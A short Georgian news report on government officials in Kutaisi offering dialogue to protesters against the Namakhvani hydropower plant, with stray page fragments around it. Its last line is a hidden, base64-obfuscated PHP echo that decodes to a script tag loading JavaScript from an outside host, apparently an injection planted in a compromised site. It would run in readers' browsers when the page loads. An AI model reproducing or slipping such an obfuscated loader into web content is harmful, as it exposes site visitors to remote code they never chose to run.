celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის დავალებით, ქუთაისში იმყოფებიან მთავრობის ადმინისტრაციის რეგიონებთან ურთიერთობის დეპარტამენტის უფროსი და ორი გუბერნატორი, რომლებიც მზად არიან "ნამახვანჰესის" მშენებლობის წინააღმდეგ მიმართული აქციის მონაწილეებთან დიალოგის გასაგრძელებლად. ამის შესახებ საქართველოს მთავრობის ადმინისტრაციაში განაცხადეს.
 
უწყებაში აცხადებენ, რომ მთავრობის ადმინისტრაციის რეგიონებთან ურთიერთობის დეპარტამენტის უფროსი ლერი ბარნაბიშვილი, სახელმწიფო რწმუნებულები იმერეთისა და რაჭა-ლეჩხუმ ქვემო სვანეთის მხარეში, ზვიად შალამბერიძე და პარმენ მარგველიძე, ასევე საპარლამენტო უმრავლესობის წევრები იმერეთის რეგიონში სახელმწიფო რწმუნებულის ადმინისტრაციაში იმყოფებიან და მზად არიან, მოუსმინონ აქციის მონაწილეებს და განაგრძონ მათთან დიალოგი.
 
ცნობისთვის, "ნამახვანჰესის" მოწინააღმდეგეები პროტესტს აგრძელებენ. ვარლამ გოლეთიანმა დღეს განაცხადა, რომ ორი პირობა აქვთ - დიალოგისთვის შეხვდნენ პრემიერს ან მის სპეციალურ წარმომადგენელს და „გუმათჰესთან“ რკინის ბარიკადები აიღონ.
1072
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");